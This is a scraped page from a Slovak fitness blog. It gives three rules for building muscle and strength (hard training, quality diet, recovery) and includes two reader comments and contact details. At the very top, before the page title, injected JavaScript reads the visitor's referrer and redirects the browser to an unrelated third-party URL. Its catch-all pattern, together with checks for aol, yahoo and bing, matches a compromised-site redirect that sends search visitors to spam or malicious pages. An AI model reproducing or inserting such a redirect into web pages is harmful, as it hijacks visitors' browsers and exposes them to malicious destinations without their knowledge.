var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/O7ul2v/intermediary.html?richubaidaninfo"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; Čo dodržiavať aby sme naberali svaly a silu? | www.bodytrener.sk
Blog
...naučte sa niečo nové!

Čo dodržiavať aby sme naberali svaly a silu?

Naše telo potrebuje pre rast svalov a sily 3 základné pravidlá, ktoré by sme mali dodržiavať. Tieto pravidlá pomôžu napredovať nášmu telu. Budeme však musieť zmeniť svoj harmonogram, ktorý sme dodržiavali doteraz.

3 základné pravidlá

  • tvrdý tréning
  • kvalitná strava
  • regenerácia

Tvrdý tréning

Aby sme mohli zväčšovať naše svaly a silu, musíme tvrdo trénovať. Pri každom opakovaní a sérii daného cviku sa musíme sústrediť. Počas cvičenia by ste mali všetky vaše starosti vyhodiť z mysle. Sústrediť sa na každé opakovanie je dôležité!

Pravidelné namáhanie svalov burcuje svalové vlákna k námahe a rastu. Každú sériu by ste mali cvičiť s maximálnym vypätím bez zbytočných prestávok. Vaše prestávky by mali byť medzi sériami a cvikmi krátke. Do fitnes centra sa nechodíte rozprávať s kamarátmi, ale cvičiť.

Nakladajte si váhy, ktoré môžete zdvihnúť a pred každým tréningom si doprajte strečing a beh na bežiacom páse alebo stacionárnom bicykli. Slúži to na prekrvenie častí Vášho tela  a máte menšiu pravdepodobnosť zranenia.

Kvalitná strava

Ak cvičíte tvrdo, ale Vaša strava neobsahuje základné nutričné hodnoty potrebné pre rast, budete sklamaný. Kvalitnou stravou docielite nárast Vašej hmotnosti, sily alebo redukciu tukových zásob.

Strava pre cvičiacich ľudí by mala obsahovať bielkoviny, sacharidy, vitamíny, minerály a zdraviu prospešné tuky. Pri dobrom pomere daných zložiek, dosiahnete požadované výsledky.

Regenerácia

Pri cvičení je veľmi dôležitým faktorom regenerácia. Po tvrdom tréningu ste unavený a potrebujete regenerovať Vaše svaly.

Na regeneráciu sa využívajú aminokyseliny a bielkoviny, ktoré pomáhajú regenerovať naše svalové vlákna.

Kvalitný a dlhý spánok je základnou zložkou pri budovaní svalov. Svaly rastú hlavne počas spánku a ak im nedoprajeme oddych, rásť nebudú alebo veľmi pomaly.

Všetky tieto informácie, ktoré sme Vám poskytli sú okrajové a neobsahujú presné hodnoty. Naše služby zahŕňajú tvorbu tréningov, jedálničkov a rady ohľadom cvičenia s presnými údajmi zameranými na Vás. Pozrite naše služby!

Diskusia (2)

    • Andrej232
    • 26. Jún 2012 o 6:32

    Týmto sa riadi, a moje výsledky sa dostavujú. Ďakujem za tréning a jedálniček.

    Odpovedať
    • Bboy uno
    • 17. Február 2014 o 21:44

    ciel nenajdeťe okamžite je to všetko o čase a treningu .držim palce. každemu kto chce zmeniť svoj život k dobremu . radšej cvičte ako keby ste maly fetovať :) ps uno

    Odpovedať

Pridať komentár




Odber noviniek

Pridajte sa k odberu noviniek a získajte najnovšie informácie o článkoch, zľavách a súťažiach.

Potrebujete pomoc?

Adresa:
Bodytrener.sk
Pažite 5
010 09 Žilina

Pracovná doba:
Pondelok – Piatok
10:00 – 18:00

E-mail: info@bodytrener.sk
Telefón: +421 904 569 865

Bankové účty:
2200359578/8330 - SLOVENSKO
2900359579/2010 - ČESKO

© 2013 Bodytrener.sk. Všetky práva vyhradené.

Pridaj si nás na Facebooku